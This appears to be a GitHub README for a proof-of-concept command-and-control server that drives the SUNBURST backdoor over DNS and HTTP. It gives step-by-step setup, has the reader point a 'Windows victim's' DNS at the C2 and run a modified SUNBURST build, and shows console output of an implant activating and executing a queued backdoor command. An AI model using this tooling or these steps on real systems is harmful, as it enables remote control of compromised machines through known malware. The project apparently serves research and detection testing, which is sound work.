PoC Sunburst DNS and HTTP C2 server
Report Bug
·
Request Feature
SunburstC2Server is a proof of concept DNS and HTTP C2 servers for the SUNBURST malware based public technical writeups and sample reversing. With this, it is possible to utilize SUNBURST to run backdoor commands.
Also included is a version of SUNBURST that is convenient for testing this C2 implementation. Delays are drastically shortened and anti-analysis checks are not performed. This C2 server would work with the unmodified sample, but waiting days to execute calc is no fun :)
To get a local copy up and running follow these simple steps.
-
python3
-
python packages
sudo pip install -r requirements_dns.txt sudo pip install -r requirements_http.txt
- Clone the repo
git clone https://github.com/CreatePhotonW/SunburstC2Server.git
- On a server (local or remote) run:
python3 sunburst_httpc2.py
- In the HTTP C2 shell, type
auto_execute 5 calc
and hit enter - On a server (local or remote) run (replace
127.0.0.1
with the IP address of the HTTP C2 server):
python3 sunburst_dnsc2.py --httpc2ip 127.0.0.1
- In the DNS C2 shell, type
auto_activate
and hit enter - Change your Windows victim's DNS server to point to the IP address of the DNS C2 server
- Build the Visual Studio solution
- Run SolarWinds.BusinessLayerHost.exe
- Wait 30-60 seconds
- SolarWinds.BusinessLayerHost.exe will reach out to the DNS C2 server and progress through the Activation phase
___ __ ___ ________
________ __ ____ \_ |__ __ _________ ______/ |_ __| _/ ____ ______ ____ \_____ \
/ ___/ | \/ \ | __ \| | \_ __ \/ ___/ __\ / __ | / \ / ___// ___\ / ____/
\___ \| | / | \| \_\ \ | /| | \/\___ \ | | / /_/ || | \\___ \\ \___/ \
/____ \____/|___| /|___ /____/ |__| /____ \|__| \____ ||___| /____ \\___ /_______ \
\/ \/ \/ \/ \/ \/ \/ \/ \/
Welcome to the Sunburst DNS C2 Coordinator.
Type help or ? to list commands.
(sunburst) auto_activate
Sunbeams will begin activation when they first connect
(sunburst) (01:08:27) [*] New sunbeam found: b'4f4774e0740a7e72'
(01:08:27) [*] sunbeam preactivated (activation step 1/2): b'4f4774e0740a7e72'
(01:08:37) [*] sunbeam activated (activation step 2/2): b'4f4774e0740a7e72'
- SolarWinds.BusinessLayerHost.exe will reach out to the HTTP C2 server and fetch its first backdoor command.
___ __ /\ __ __ ________
________ __ ____ \_ |__ __ _________ ______/ |_ | |__ _/ |__/ |_______ ____ \_____ \
/ ___/ | \/ \ | __ \| | \_ __ \/ ___/ __\| | \\ __\ __\____ \_/ ___\ / ____/
\___ \| | / | \| \_\ \ | /| | \/\___ \ | | | \| | | | | |_\ \ \___/ \
/____ \____/|___| /|___ /____/ |__| /____ \|__| |___| /|__| |__| | ___/\___ /_______ \
\/ \/ \/ \/ \/ |__| \/ \/
Welcome to the Sunburst HTTP C2 Server.
Type help or ? to list commands.
(sunburst) auto_execute 5 calc
Sunbeam will process the next auto execute job in the queue on its next HTTP response
(sunburst) (01:08:39) [*] New sunbeam found: b'4f4774e0740a7e72'
- SolarWinds.BusinessLayerHost.exe will run a RunTask job (id=5) to spawn calc
See the open issues for a list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are greatly appreciated.
- Fork the Project
- Create your Feature Branch (
git checkout -b feature/AmazingFeature
) - Commit your Changes (
git commit -m 'Add some AmazingFeature'
) - Push to the Branch (
git push origin feature/AmazingFeature
) - Open a Pull Request
Distributed under the MIT License. See LICENSE
for more information.
CreatePhotonW - @CreatePhotonW
Project Link: https://github.com/CreatePhotonW/SunburstC2Server